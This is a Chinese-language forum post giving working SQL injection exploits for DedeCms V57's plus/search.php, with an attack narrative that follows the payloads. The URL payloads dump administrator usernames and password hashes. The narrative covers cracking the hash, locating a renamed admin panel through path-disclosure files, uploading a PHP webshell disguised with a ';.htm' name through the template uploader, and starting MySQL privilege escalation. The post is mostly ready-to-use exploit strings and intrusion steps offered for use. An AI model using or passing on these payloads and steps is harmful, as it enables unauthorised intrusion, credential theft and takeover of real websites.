服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

运维之家

 找回密码
 注册
搜索
查看: 9501|回复: 0

DedeCms V57 plus/search.php文件SQL注射

[复制链接]
dirtysea 发表于 2013-4-12 14:20:01 | 显示全部楼层 |阅读模式
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
转载不加作者名的没JJ
作者:鬼哥

看结果如果提示
Safe Alert: Request Error step 2 !
那么直接用下面的exp
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
看结果如果提示
Safe Alert: Request Error step 1 !
那么直接用下面的exp
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
如果正常显示证明漏洞不存在了。





利用代码一 需要 即使magic_quotes_gpc = Off

http://www.myhack58.com /plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title

这只是其中一个利用代码… Search 类的构造函数再往下

……省略
$this->TypeID = $typeid;
……省略
if($this->TypeID==”0″){
            $this->ChannelTypeid=1;
        }else{
            $row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
//现在不鸡肋了吧亲…
            $this->ChannelTypeid=$row['channeltype'];

        }
利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.

http://www.myhack58.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title

如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站




得到的是20位的MD5,去掉前3位和最后1位,然后就是16位的MD5值了,解之,得到了密码

大多数的DEDE站都能爆出账号和密码,但是,同样大多数网站都把后台地址修改了啊。
输入dede回车,果然没有。
好吧,来试试老版本爆织梦路径的方法吧,
/include/dialog/select_soft.php         
/include/dialog/config.php
include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p

提示需要输入后台地址,无果,再换一个方法:
/data/mysql_error_trace.inc
此文件记录mysql查询错误,如果有后台查询出现错误,则会暴露后台路径。
输入回车后,啥也没显示,蛋蛋疼了吧...

看了看robots.txt,很明显是织梦默认的robots,但是没有发现后台地址...
用工具扫一下吧...
一般被修改了默认后台地址的,用工具扫出来的几率几乎为0,因为把dede修改为常见的admin等类似地址,
等于没修改,但我们不能放过任何一个机会,边扫边手工尝试几个...
尝试了网站名字,跟拼音首字母,也无果,工具也扫完了,no found !
既然是某某旗下网站,那尝试一下主站的名字吧,也无果,继续各种尝试ing....
打算准备放弃了,最后把域名复制了一下,回车后,竟然来到了熟悉的登录框...
登录之~
织梦后台拿shell的方法很多,文件管理器里面没有东东,那就新建模板吧。
【模版】----【默认模板管理】----【上传模板】---【选择文件】


将php大马或者一句话修改为fuck.php;.htm,然后上传...

上传后,可以直接打开...

打开我们的马...下一步,提权...
对于php网站,我一般用mysql提权,但是前提必须的root权限,好,来看一下:
/data/config.file.inc.php

您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|手机版|Archiver|运维之家

GMT+8, 2024-3-28 21:54 , Processed in 0.175272 second(s), 17 queries .

Powered by Dirtysea

© 2008-2020 Dirtysea.com.

快速回复 返回顶部 返回列表